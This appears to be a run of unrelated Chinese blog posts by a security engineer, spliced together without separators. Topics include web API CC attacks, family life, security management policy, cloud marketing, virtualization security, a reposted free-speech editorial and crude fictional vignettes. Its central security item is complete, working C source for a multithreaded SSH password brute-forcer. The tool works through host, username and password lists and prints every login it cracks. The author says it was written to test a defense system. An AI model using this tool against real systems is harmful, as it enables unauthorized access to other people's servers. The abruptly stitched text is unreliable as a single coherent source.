首先是WEB API的大规模使用。不管是微博，还是网盘、图库、云存储，不开放一些WEB API出来给开发者调用，都不好意思跟别人打招呼。更何况比较大的互联网企业如腾讯、百度、阿里，都想学苹果做平台，天天说开放，想把开发者捆在自己身上加重自己的份量。一般来说开发者都比较容易激动，现实中可能沉闷但是在网上尤其活跃，出一点问题就会微博上四处转播宣扬，所以攻击WEB API惹到他们无疑是一个很好的想法。

其次在技术层面，对WEB API的CC攻击防御困难得多。在前WEB API时代，攻击目标只能是动态页面。由于攻击者是使用普通的攻击程序而正常使用者使用浏览器访问页面，一个不解析JS一个解析JS，一个不follow跳转一个follow跳转，正常用户和攻击者的区别是非常明显的，因此各地设备厂商都不约而同使用类似的方案，返回JS做客户端跳转啦，验证码啦，302重定向啦之类方式做人机识别。但是现在，问题来了。正常用户可能也是通过程序调用WEB API的方式来访问业务，攻击者和正常用户都是使用程序而不是浏览器访问，以前那些人机识别的方案已经行不通了，强上只能是大量的误报。

如何解决？嘿嘿。

现在这个季节是老家最好的时候，各种花都开了，蜜蜂蝴蝶乱飞，野菜、类似草莓的野果也都出来了。这个季节最好的野菜，莫过于这四种：水竹笋、松乳菇、蕨菜以及小蒜。水竹笋就长在屋子旁边，早上起来走两步就看到带着水珠的细细尖尖的孙，抽一大把回家一洗一剥，简单炒炒吃稀饭就是无上的美味，何须调料？何况还有田边的小蒜，和鸡蛋煎在一起，那个香味永远都忘不掉。两碗粥，一盘笋，一盘小蒜煎蛋，有比这更好的早点么？松乳菇就需要煮面条或者做汤了，油都不需要，拿清水煮，放点盐即可，出锅之后就是满屋的鲜味，绝不是鸡精之类可以比拟的。

可惜永无机会在这个季节回到老家。

我弟弟0点从张家港开车出发，25日凌晨3点到杭州我住处。随后开我的车回湖北。黄山、景德镇、九江一路走过来，暴风暴雨，很是辛苦，也比较危险。叔叔伯伯、堂哥堂弟也各自驾车连夜赶回，最远的是五弟从四川奔波1200公里赶回。虽然明知每个人都有这么一天，却也免不了伤心。可惜免不了伤心，却也逃不过这一天。

我至少有10年没有在这个季节回过农村老家了，每年都是春节待上2-3天。所以这次，特地到处走了一下，很多地方变了，也有很多地方依旧。我亲手种下的树，已经只有一棵还存在。

还好有google reader，可以把丢失期间的博客重新写出来，遗憾的是评论中的讨论永远消失了。这个周末写备份脚本，每天一次！另外，我的宝宝马上半岁了，她的博客也可以发布出来了。http://baby.icylife.net，我会一直写到她自己会写为止。

不是很久之前，我测试一个自动防御系统，需要进行ssh密码扫描。试了medusa和ncrack，悲剧的是在我的环境下都不够稳定。无意中发现坐对面的同事在用一个小巧的程序做测试，跑得还行，于是我说不错啊，这程序哪儿搞的。他看了一下代码，说”你写的“，于是我让他把代码发给我。最近一段时间一直没有更新博客，不是没有写的，而是可写的太多反而不知道写什么好，而且有些东西也不方便写出来。干脆贴一个老代码，滥竽充数吧。

/*  it's not a cracker, but scanner.
version 0.1, code by yunshu(wustyunshu@hotmail.com) 2010-09-08
you should install botan and net7ssh first, complie with "gcc sshscan.cpp -lnet7ssh -lbotan -o sshscan"
be sure the ssh port is open, it will not detect service when it is scanning.  */
 
#include <stdio.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <pthread.h>
#include <ne7ssh.h>
 
#define	MAX_HOST	10
#define	MAX_CONNECTION	5	
#define	USER_NAME	"%USERNAME%"
 
typedef struct
{
	char target[512];
	int  cracked;
	FILE *user_fd;
	char pwd_file[512];
	pthread_mutex_t mutex;
}ScanArgument;
 
ne7ssh *ssh;
 
void Usage( char *str )
{
	printf( "%s  <ip_list>  <user_list>  <pwd_list>\n", str );
}
 
// copy from internet
char *
StringReplace(char *str, char *old, char *new_str) {
	  int i, count = 0;
	    int newlen = strlen(new_str);
		  int oldlen = strlen(old);
 
		    for (i = 0; str[i]; ++i)
				    if (strstr(&str[i], old) == &str[i])
						      ++count, i += oldlen - 1;
 
			  char *ret = (char *) calloc(i + 1 + count * (newlen - oldlen), sizeof(char));
			    if (!ret) return NULL;
 
				  i = 0;
				    while (*str)
						    if (strstr(str, old) == str)
								      strcpy(&ret[i], new_str),
										        i += newlen,
												      str += oldlen;
					    else
							      ret[i++] = *str++;
 
					  ret[i] = ' \\0 ';
 
					    return ret;
}
 
void *CrackPwd( void *_arg )
{
	ScanArgument *arg = (ScanArgument *)_arg;
	char user[256] = { 0 };
	char tmp[256] = { 0 };
	char pwd[256] = { 0 };
	int cracked = 0;
 
	FILE *pwd_fd = fopen(arg->pwd_file, "r");
 
	while( 1 )
	{
		// all users done, this thread will exit.
		pthread_mutex_lock( &arg->mutex );
		if( feof(arg->user_fd) )
		{
			pthread_mutex_unlock( &arg->mutex );
			break;
		}
 
		// read username
		memset( user, 0, sizeof(user) );
		fgets( user, sizeof(user)-1, arg->user_fd );
 
		cracked = 0;
 
		pthread_mutex_unlock( &arg->mutex );
 
		// skip blank line
		while( user[strlen(user)-1] == '\r' || user[strlen(user)-1] == '\n' )
		{
			user[strlen(user)-1] = ' \\0 ';
		}
		if( strlen(user) < 1 )
		{
			continue;
		}
		//printf("test username:%s\n", user);
 
		//rewind(pwd_fd);
		while( !feof(pwd_fd) )
		{
			if( cracked == 1 )
			{
				//printf( "[found], try next user name.\n" );
				break;
			}
 
			memset( tmp, 0, sizeof(tmp) );
			fgets( tmp, sizeof(tmp)-1, pwd_fd );
			//printf("test tmp:%s\n", tmp);
 
			while( tmp[strlen(tmp)-1] == '\r' || tmp[strlen(tmp)-1] == '\n' )
			{
				tmp[strlen(tmp)-1] = ' \\0 ';
 
			}
			if( strlen(tmp) < 1 )
			{
				continue;
			}
 
			memset(pwd, 0, sizeof(pwd) );
			strncpy( pwd, StringReplace(tmp, USER_NAME, user), sizeof(pwd)-1 );
 
			//printf( "<test> %s %s/%s\n", arg->target, user, pwd );
    		int channel = ssh->connectWithPassword ( arg->target, 22, user, pwd, false, 4 );
    		if (channel >= 0)
    		{
				ssh->close(channel);
				printf( "[found] %s  %s/%s\n", arg->target, user, pwd );
				cracked = 1;
    		}
		}
 
	}
 
	fclose(pwd_fd);
	return NULL;
}
 
void ProcessHost( char *host, char *user_file, char *pwd_file )
{
	int index;
	ScanArgument arg;
	pthread_t workers[MAX_CONNECTION];
 
	arg.user_fd = fopen(user_file, "r");
	strncpy( arg.pwd_file, pwd_file, sizeof(arg.pwd_file)-1 );
	strncpy( arg.target, host, sizeof(arg.target)-1 );
	pthread_mutex_init( &arg.mutex, NULL);
	arg.cracked = 0;
 
	//printf("processing %s\n", host);
	for( index = 0; index < MAX_CONNECTION; index ++ )
	{
		pthread_create( &workers[index], NULL, CrackPwd, (void *)&arg );
	}
 
	for( index = 0; index < MAX_CONNECTION; index ++ )
	{
		pthread_join( workers[index], NULL );
	}
 
	fclose(arg.user_fd);
	//printf("all thread exit.\n");
}
 
void ProcessHostList( FILE *host_fd, char *user_file, char *pwd_file, int *current_host )
{
	int pid = 0;
	char host[512] = { 0 };
 
	memset( (void *)host, 0, sizeof(host) );
	fgets(host, sizeof(host) - 1, host_fd );
 
	while( host[strlen(host)-1] == '\r' || host[strlen(host)-1] == '\n' )
	{
		host[strlen(host)-1] = ' \\0 ';
	}
 
	if( host[0] == '\r' || host[0] == '\n' || strlen(host) < 4)
	{
		return;
	}
 
	pid = fork();
	if( pid < 0 )
	{
		perror( "fork error for." );
		return;
	}
 
	if( pid == 0 )
	{
		ProcessHost( host, user_file, pwd_file );
		//printf( "exit one.\n" );
		exit( 0 );
	}
	else
	{
		(*current_host) ++;
	}
}
 
int main(int argc,char *argv[])
{
	FILE *host_fd;
	int current_host = 0;
 
	if( argc != 4 )
	{
		Usage( argv[0] );
		return -1;
	}
 
	// open all files
	host_fd = fopen( argv[1], "r" );
	if( NULL == host_fd )
	{
		perror( "open ip list error." );
		return -1;
	}
 
	// init ssh library
	ssh = new ne7ssh();
 
	// create enough child frist.
	while( current_host < MAX_HOST )
	{
		//printf( "now %d hosts.\n", current_host );
		// all host done(when the totle number of hosts is less than MAX_HOSTS)
		if( feof(host_fd) )
		{
			//printf( "feof.\n" );
			break;
		}
 
		// process new host
		ProcessHostList( host_fd, argv[2], argv[3], &current_host );
	}
 
	while ( wait(NULL) > 0 )
	{
		//printf( "we can get new.\n" );
		// all host done, wait all child exit.
		if( feof(host_fd) )
		{
			//printf( "wait to quit.\n" );
			current_host --;
			sleep( 2 );
			continue;
		}
 
		// process new host
		ProcessHostList( host_fd, argv[2], argv[3], &current_host );
	}
 
	// clean up
	fclose( host_fd );
 
	delete ssh;
	printf( "All done.\n" );
 
	return 0;
}

我们的阿里云提供类似亚马逊的Web Hosting服务，各种网站各种业务都有，因此需要把以前只给内部提供的一些安全服务作为增值业务推到外部去，给使用Hosting业务的客户使用，让他们无需研究安全就可以得到保护。这里就涉及到系统改造，最简单的方式是在原有系统的外面再包装一层，让Hosting业务的前端调用WEB API间接的使用安全服务。这个方案，其实2008年我有做过类似的事情，当时时包装SUN的一个认证系统，见 http://www.icylife.net/yunshu/show.php?id=650

。问题在于，当年的这个系统很小，实施起来比较简单。而现在的涉及到前端业务的变化和复杂度，再加上性能的考虑，这个API的颗粒度如何把握？

首先看看颗粒度比较细的API的劣势，显然的，粒度越细的API调用起来越繁琐。假设安全部门侦测到某个IP的VM处于SSH密码猜解状态，需要调用后端的系统做处理。这时候可能要先调用WEB API将VM IP转换为VM Name，基于VM Name查询VM ID，基于VM ID再做策略变更，我相信大多数的开发者面对这种连锁的API调用都会抓狂的，而且代码会非常的累赘。另一方面，WEB API是远程调用，HTTP协议性能并不高，来来往往的解析导致整个系统最终的性能会非常的差。但是，这种细粒度的API也带来很大的好处，那就是灵活性，无与伦比的灵活性。整个系统在物理上可以分布式架构，也不用顾忌不同的语言之间的整合。最重要的一点是，前端频繁的业务变化不会带来后端API的变化，只需要调用者修改代码组合不同的API就可以实现新的功能。

相比而言，粗粒度的WEB API优缺点也很清楚，就无需多说了。那么是否有好的方式，兼顾两点？我的看法是很难。具体粒度如何粗细，只能凭借经验去把握了。

上周五是Icy二十九岁生日，周六则是我们结婚三周年纪念。一晃就是三年了。自从有了宝宝之后，生活改变了许多，不过周六还是偷闲过了比较洒脱的一天，把宝宝完全交给了岳母。我和Icy午饭后出门，去万象城买东西、看电影。悲剧的是多了一个庆春过江隧道，新修的，路很好，于是我毫不犹豫一路开到了萧山。周折之后才到达万象城，稍微好看点的也就是一个《失恋三十三天》，不过我觉得这个实在不适合结婚纪念日看，于是就把目标改变为单纯的买衣服，然后在仙踪林坐坐吃点小点心。五点开始返回市区，因为我周五预定了杭州大厦楼上的王品台塑牛排晚餐。

差不多六点二十到达杭州大厦，服务生把我们带到座位的时候，一切都已经准备好了。靠窗的角落，桌上撒上了玫瑰花，还有花瓣摆成的心形，很喜欢。饭后回家，宝宝已经睡得很甜了。结婚四周年的日子，我们就可以带着宝宝一起，那时候她该有一岁半了。

在甲方做事情，要习惯能用技术搞定的都不是问题，人才是问题。很多好的方案没有得到彻底的执行，很多完善的流程以及标准操作手册，都有人有意无意的跳过，打包好的经过安全加固的软件包，产品运维部门的人视而不见却喜欢耗时的自己编译，然后看着屏幕上一屏一屏的刷过的字幕发呆。当你对这些事情感到痛苦的时候，那就说明有一些甲方的经验了。解决这种问题，有五大法宝，策略、标准、流程、复核，以及行政处罚，五大法宝是互相协调不可分割的，贯穿其中的是良好的沟通。

策略，就是“法律”，明确的描述出什么事情是不可以做的，做了之后会有什么样的后果，导致什么样的处罚。这是后面的标准、流程、复核以及处罚的基础，立法在先，勿怪言之不预。策略的编写，是一定不可以一个人坐在座位上写的，这样的脱离实际无法执行的策略发出来注定骂声一片。好的策略，一定要多方面的沟通，IT、SA、NET OPS（Network Operation）、APP OPS（Application Operation）、DEV、QA各个部门都要照顾到沟通到，了解他们日常工作中的做法，在此基础上以提升安全性为目标做一些修订。策略描述可否，不涉及到具体事情的操作细节，常见策略如：IDC对外开放端口策略、公司内部网络访问策略、服务器上线策略、软件包部署策略、外包人员管理策略等等，由于公司安全制度我就不说太多。

相比策略而言，标准就是操作细节，类似于卫生部公布的《老年人跌倒干预技术指南》。对照来看，策略里面包含服务器上线策略，里面可能规定操作系统要进行安全加固配置，那么，标准里面就应该包括企业常用的各种OS加固标准，明确加固一步一步应该怎么做，让新手可以按照标准中的描述顺利完成整个加固过程。当然，好的标准还可以提供实施的自动化工具，帮助操作者自动化完成某些工作。标准需要尽可能做到完善，从底层的OS加固，到上层的WEB代码的编写，到员工离职后的IT部门的操作，都需要涵盖到。

策略和标准，都是纸面上的东西，而且也非常容易只是存在于纸面，除了让外审看起来很漂亮之外在没有别的用处。解决这个问题，就需要流程出手了，流程的主要作用是用来保证安全部门的各项策略在部门间顺利执行，流程的每一步，都涉及到一个或多个标准。同时，流程需要注意单点问题，每一个关键的步骤，都需要有多个人员备份。还是以上面的服务器上线策略为例，在流程的SA缓环节，他们可能需要遵循服务器安装标准，在APP OPS环节，他们可能需要遵循应用软件如apache加固标准。其次，流程能够带来信息透明度，这一点对安全部门来说尤为重要。因为网络是一个整体，安全更是一个动态平衡的过程，某一个方面的一点小改动，如新增一个IP段，新加一个静态路由，都有可能导致另一个地方的ACL出现缺陷。安全部门需要及时的了解这种大大小小的变化，根据策略推动对应部门实施针对这种变化的措施。关于流程，还有一点非常的重要，那就是不同的时期对流程有不同的期待。企业的初期流程很少，变更非常的轻巧快捷，这是初恋。但是随着公司逐渐壮大，会形成一个混乱期，发现事情缺乏一种条理性，有些事情找不到对应的负责人，这是感情在长跑。这个时候，公司会着手大力建立流程，开始逐渐感受到美好，一切井井有条，这个是蜜月期。随着时间的退推移，流程会越来越多，当发现做事情非常的僵化，缺少灵活性企业变得像国企一样的按部就班的时候，那就是婚后的麻木期了。这个时候，公司又会开始精简流程，做一些适当的删减。总之，流程就是一个轮回的过程，动态的平衡，需要小心的把握。

流程很好，但是并非绝对能保证策略和标准完美精准的执行下去，因为执行者是有感情的人，甚至可能因为前一天晚上没爽到导致第二天执行流程审批的时候一疏忽就放过去一个不应该批准的申请。因此，我们需要最后一步，复核。复核是最后一道关卡，可以是每个流程执行完毕都触发一次，也可以是周期性的自动触发审核所有的网络和系统。需要注意的是，复核的内容需要和策略以及标准是对应的，否则最终会形成无法可依的局面，在打人板子的时候找不到着力点，因为他们会有一个很好的理由，那就是安全部门没告诉我不能这么做。

最后终于到了行政处罚了，关于这一点，我不想多说。多少年来，就一直有人争论是要技术还是要管理，是三分技术七分管理还是七分技术和三分管理等等诸如此类，所以我就不参与了。我的观点是吃米饭不影响吃面条，这顿吃米饭下顿吃面条，这顿吃米饭下顿继续吃米饭，都是可以的，能吃饱就行。只是行政处罚一定要非常慎重使用，这个属于大杀器。BTW，我今年在阿里就被行政处罚过，当然是我做事考虑不周导致出现网络故障。

总的来说，我的观点是安全部门的责任是明确的告诉大家如何不犯法，并且提供各种手段保证大家尽可能不犯法。最后对于出现的不好行为，做到有法可依，有法必依，执法必严，违法必究。就我个人而言，我做得并不好，知易行难。

1. 懂安全。
2. 喜欢安全。

各位有意向的同学们赶紧的啊，杭州的妹子都给你们留着的。
整个行程如下，也许你们还有人能碰到传说中的刺。

校园招聘时间安排：
西安：    9月22-25日
哈尔滨： 9月25-28日
成都：     9月26-28日
南京:       10月10-13日
合肥：    10月10-12日
武汉：    10月10-13日
上海：    10月14-17日
北京：    10月14-17日
天津：    10月15-17日

---------------------------------我是很饿的分割线-----------------------------------------------

刚起床。看了一下IT新闻，十条有八条是云，各种云，各种装，各种混乱，心头火起。我想大喊一声，而且我也曾经大喊过，不要对最终用户谈云，云对最终用户是毫无意义的。云不是目标，只是技术手段，云的意义只在于部署云的企业，为他们节省成本。用户看到的只是应用，是服务，服务好用我就用，不好用就滚。吃一个菜好吃，我管你是用平底锅做出来的还是用内力烤熟的。

现在的云，一般都分为三个层次：IAAS、PAAS、SAAS。首先说IAAS，这是最底层的，基础架构即服务。本质是什么？大家都知道的，卖VPS虚拟机嘛。你说你使用了云技术，但是对用户来说，他们看到的就是这些，并不比以前的VPS高明多少。你说你使用了云技术，很好，那么对用户来说有哪些方面的提升？VM故障迁移，数据备份，负载均衡，还有没有？没有了？数据备份、负载均衡没有云的时候，是否可以实现？那么，你为什么不直接告诉用户我们可以做到故障实时迁移，可以做到数据备份保证不会丢失，通过负载均衡保证业务稳定？而要说我们是云，我们是云，云就是好啊就是好。显然，在PAAS里，云只是手段，目的是为了实现备份、迁移等技术保障业务稳定、安全，而且云并非唯一手段。

其次是PAAS，平台即服务，这一块的产品有GAE、SAE以及阿里的ACE，都是云。云你妹啊，用户看到的是什么？提供一些封装好的上层API，加上支持某种阉割掉一些功能的动态语言的免费主页空间，是不是这样？是不是这样！云在这里跟2002年那些免费的支持PHP语言、MySQL数据库的免费主页空间有多大提升？别人还是完整功能的PHP啊，亲。云？RR DNS加上LVS加上Nginx加上Apache是不是就能实现？你给我100台服务器，我花两个星期阉割一个支持PHP，支持Lua的Application Engine云给你看看。唯一的优点是封装的API，开放了引擎提供者的某些服务。但是这个开放API和云有多大关系？只要开放API我随便搞一个免费空间就行了，随心所欲的写程序。云在这里能做什么？还是故障迁移，数据备份，负载均衡么？那为什么不直接告诉用户通过云这个技术手段实现的目的呢？手段别人不关心的，关键是通过手段实现了的东西啊！

最后是SAAS，软件及服务。这一点，我都不稀罕说了。云同步，云邮件，云聊天，云相册，我笑了，不是还有云舒么？对于移动平台，不就是B/S又有点失势了C/S死灰复燃了么？甚至有的直接在桌面搞一个URL的快捷方式就是云了啊。同步，邮件，相册，没有云的时候有没有这些服务！？那么云的好处是什么？我擦，还是备份，哦，还有空间大，随地存取。但是这些，没有云的时候不也可以么？只要我有钱，我买很多NAS，空间是不是一样大？备份是不是一样能够做好？至于随时跨平台存取，那是因为以前移动平台没发展起来没有人写手机客户端啊，写个客户端就成了云了？云在这里的好处，不是对用户的，是对部署云的企业的，省钱啊！！

额外的，单独说一下分布式计算。确实，可以带来很多好处，但是有个人用户写job去跑的么？面对的用户会是中小型企业，最终受益的还是企业。老老实实的告诉他们，这个分布式计算能够提供怎么样的计算能力，节省多少时间就行了，不要说我们是云我们是云，云只是实现这个分布式计算的技术手段。我相信，他们也不会关心这个，他们只在乎我的job多久跑完，结果是否正确。

云，只是技术手段，不是目的。我们应该直接告诉用户云这个技术在业务上实现了哪些东西，带来了哪些明确的好处，而不要一直在宣传“我们是云”。用户不关心是不是云，云对最终用户是毫无意义的，他们只关心业务是否好用！！云只对通过云技术提供服务的企业存在意义，帮助他们省钱。记住，用户不关心云！！

BTW，很抱歉PPT删掉了两页。另外，我的PPT一向很素很素……

点击这里下载

搞完代码突发奇想，决定去北高峰看日落。没有任何理由的，突然这么想，连自己都吓了一跳。于是乎查路线，准备过去。准备得差不多了，突然有心灰意冷懒得去了……悲剧。更悲剧的是，我想把这个神奇的事情分享给LP大人听一下。因为我很少运动，一个人爬山看日落这么有情调的事情，更不是我的做法，至少最近几年没这种浪漫的念头了。

果不其然，打电话告诉LP后，她很惊讶，也有些疑惑……我只是突发奇想，但是她却想提炼出一个中心思想来，并让我归纳出一个这么想的理由。我自己都不知道为什么突然想去，何等的悲催啊。

以后不乱想了……

佛书里有这样一段神话：
 
有一只鹦鹉，飞过雪山，遇见雪山大火，他便飞到水上，垂下翅膀，沾了两翅的水，飞去滴在火焰上。雪山的大神看他往来滴水救火，对他说道：“你那翅膀上的几滴水怎么救得了这一山的大火呢？你歇歇吧？”鹦鹉回答道：“我曾住过这山，现在见山烧火，心里有点不忍，所以想尽一点力。”山神听了，感他的诚意，遂用神力把火救熄了。
 
我们现在创办这个刊物，也只因为我们骨头烧成灰毕竟都是中国人，在这个国家吃紧的关头，心里有点不忍，所以想尽一点力。我们的能力是很微弱的，我们要说的话也许是有错误的，但我们这一点不忍的心也许可以得着国人的同情和谅解。
 
近两年来，国人都感觉舆论的不自由。在“训政”的旗帜之下，在“维持共信”的口号之下，一切言论自由和出版自由都得受种种的钳制。异己便是发动，批评便是反革命。报纸的新闻和出版自由至今还受检查。稍不如意轻的便是停止邮寄，重的便是封闭。所以今天全国之大，无一家报刊杂志敢于有翔实的记载或善意的批评。
 
负责任的舆论机关既被钳制了，民间的怨愤只有三条路可以发泄：一是秘密的小册子，二是匿名的杂志文字，三是今天最流行的小报。社会上没有翔实的新闻可读，人们自然愿意向小报中去寻找快意的谣言了。
一个国家没有纪实的新闻而只有快意的谣言，没有公正的批评而只有恶意的谩骂和丑诋，——这是一个民族的大耻辱。这都是摧残言论出版自由的当然结果。
 
我们是爱自由的人，我们要我们的思想自由，言论自由，出版自由。
 
我们不用说，这几种自由是学术思想进步的必要条件，也是有国社会政治改善的必要条件。
 
我们现在要说，我们深深感觉国家前途的危险，所以不忍放弃我们的思想言论的自由。
 
我们的政府至今还在一班没有现代学识没有现代训练的军人政客的手里，这是不可讳的事实。这个政府，在名义上，应该受一个政党的监督指导。但党的各级机关大都在一班没有现代学识没有现代训练的少年党人手里，他们能贴标语，能喊口号，而不足以监督指导一个现代的国家。这也是不可讳的事实。所以在事实上，党不但不能行使监督指导之权，还往往受政府的支配。最近开会的“第三次全国代表大会”，便有百分之七八十的代表是政府指派或圈定的。所以在事实上，这个政府是绝对的，是没有监督指导的机关的。
 
以一班没有现代知识训练的人统治一个几乎完全没有现代设备的国家，而丝毫没有监督指导的机关，——这是中国当前最大的危机。
 
我们所以要争我们的思想言论出版的自由，第一，是要想尽我们的微薄能力，以中国国民的资格，对于国家社会的问题作善意的批评和积极的讨论，尽一点指导监督的天职；第二，是要借此提倡一点风气，引起国内的学者注意国家社会的问题，大家起来做政府和政党的指导监督。
 
我们深信，不负责任的秘密传单或匿名文字都不是争自由的正当方法。我们所争的不是匿名文字或秘密传单的自由，乃是公开的，负责任的言论著述出版的自由。
 
我们深信，自由的方法在于负责任的人说负责任的话。
 
我们办这个刊物的目的便是以负责任的人对社会国家的问题说负责任的话。我们用自己的真姓名发表自己良心上用说的话。有谁不赞成我们的主张，尽可以讨论，尽可以批评，有尽可以提起法律上的控诉。但我们不受任何方面的非法干涉。
 
这是我们的根本态度。

来一张照片，我和爷爷在西湖划船的。

再来一张傍晚时分在雷峰塔前，花开得很好。

四月初清明节，加上请年假以及周末抽出了大概10天的空闲，回LP的老家去陪LP和宝宝。老家环境还是不错的，卧室窗下就是两排梧桐树，稍远一点一大片果园，开满了梨花。梨花旁边是一望无际的油菜，清明时节刚好开得正好。每天早晚时分，梧桐树上都有数不清的鸟儿在叽叽喳喳。回家的那些天都不怎么碰电脑和手机，每天就和LP散散步，打打牌，聊聊天，日子也挺好的。4号那天第一次摸到宝宝的胎动，乱激动了一把！后来做B超检查，亲眼看到小手晃来晃去的。医生说在吮吸手指，真是个贪吃的家伙啊。下次再回来，不知道是什么时候，希望回来陪宝宝过TA的第一个儿童节，虽然TA还在ICY的肚子里面，哈哈。

前几天公司在浙大年会，讲了很多东西，虚拟化啊分布式计算啊还有各种XAAS。我高兴的是，可以称得上国内最大的虚拟化云计算机房，也有我的一份辛苦——虽然他们没念我的名字，不过我自己心里知道我做了什么学到了什么就行了。年会的第二天是去爬山，云溪竹径，名字有意境，山则一般。漫山遍野的采茶人，到让我想起了小学时候的勤工俭学，采茶我也行的。

最近公司一直在很努力的帮我解决户口问题，很艰难所以很感谢。这就是我党的政策啊，要是当年蒋某人也搞这一套，我看天下现在还是他们的。

他年收入3万元

自己大专毕业后，就直接回家了，没事和留在大城市的同学打打电话，感觉他们活得比自己丰富多彩多了，这个小城镇，就那么几家商场，连杰克琼斯都没有，虽然自己也不买吧，但是看看还是挺过瘾的，现在自己在叔叔的超市帮忙，一个月开两千多，比小城里大多数这个岁数的年轻人都挣的多了，想想还是挺开心的，再也不担心没钱上网了，对了，叔叔有辆小
奥拓好像说给我，回头俺也是有车的人啦！虽然小红喜欢qq，但是三万多我一年不吃不喝也买不起啊，小红和超市里收银的小武都追我呢，小武好看些，但是才挣七八百，好像是临时的，小红的爸爸是县林业局的，家里有一套林业局的老房子没人住，可能给小红当婚房，但是身材和长相都不如小武好，我该选谁呢，唉，烦死我了。。。前几天听说大学时的女友现在嫁了一个省会的小子，留在省会了，靠，那小子还没我下巴高呢，艹！

他年收入2万元

中专毕业后，直接从地级市的城市返回老家，想想自己真是没出息啊，除了踢得一脚好足球，好像没啥本事了 ，哦，不是，自己在床上还是蛮威猛的，中专期间的2个女友都为自己坠过胎，想想虽然对不起他们，但是床上确实把她们满足了，自己家是农村的，地都被占了，父亲没有地钟，现在在县城里拉三轮呢，每月也就挣个1500块，想想自己拿父亲 拉三轮挣的钱给俩女友乱花乱造，真是鼻子有些泛酸，还好回家就找到事干了，帮朋友开的网吧看摊，职业应该叫做“网管”吧，每月能挣个一千六七，不错了，我们同学好多人毕业就回家种地了，别的网吧的网管好像也就开个一千二三。。。每天跟和我换班的小美女打打闹闹也挺幸福的啊，她是不是真看上我了，呵呵，我这接着当网管的便利，能看到好多漂亮妹妹的qq号，我该从哪个开始下手呢....

他年收入上亿

他年收入上亿，他自己不知道自己一年能挣多少钱，或者自己拥有多少钱，钱在于他只是数字了，他开着奔驰的加厚防弹车驰骋在深圳的南山大道上，颇有些德高望重的意思，谁要是敢别他，他就急加油上去，从前面把那个车一别，直到把他别在护栏上才扬长而去。。。他在22年前（玐九年）大学毕业，那一年的大学生分配本来就不好，他还上的事一个二流大学，更没地方落脚了，干脆去了深圳，刚开始在半导体工厂上班，后来升职，加薪，自己出来干，当年的初恋女友嫁人了，可他每次抱着女明星或者主持人的时候想起来的还是她，他已经很多年不和老婆做爱了，但是他还是爱老婆的，也早就不再打老婆了，老婆也不容易。。。每次他从澳门赌场回来，或者得意或者失意，总要和赵局去耍一下，喝多了酒，眼珠子发红的他往小三家开车，越开越快，越开越快，这个时候，脑子里只有一个想法：你为什么不去死。。。你还活着还有什么意思。。。你为什么不去死。。。。

当然，在安全性上面这种方式比虚拟化稍微差一些。不仅仅是差在网络层面，还差在系统层面。一个业务的web被渗透，很轻易的就能够扩散到其它的应用，传统的安全域基本被打散了。不知道用chroot、jailkit之类隔离各个web进程、加固，能起到多大的作用。

二. 虚拟化的安全问题
对于虚拟化而言，不同的业务依旧在不同的服务器上，如果虚拟化系统可靠则系统安全性和传统IDC服务器相当。但是相比传统方式，依旧有自己的问题，主要表现在网络层面。简单的说，现在的虚拟化只不过是把交换机的下降到了服务器，把宿主机当成一个装了Linux系统并且和server共享了CPU、内存、存储资源的交换机在使用。传统的安全域、ACL、流量管理依旧是难以实施的。思科的VN-TAG，VMware的VDS，惠普的VEPA，Chelsio网卡内嵌CPU、虚拟端口和虚拟交换机，都试着给出一个通用的方案从根本上解决这个问题。

我们的虚拟化也遇到了类似的情况，但是是通过软件方式解决的。简单的说厂商们试图在二层解决问题，而我设计安全方案当初是尽量把网络简化，从三层去考虑，把二层的一些东西该杀掉的杀掉。目前看来还是可以的，阿里的虚拟化已经有较大规模的使用了，状态还不错。

我并不是说厂商的不好，他们的设计思路都非常精彩，只是他们要考虑的东西太多，需要兼容各种环境各种设备。对于我们这边来说，只需要给出我们自己特定环境下的解就行了。这就是定制化，互联网企业定制化的独特的东西，类似于前几天flashsky说的web安全的发展一样，安全厂商、设备厂商逐渐开始慢起来了。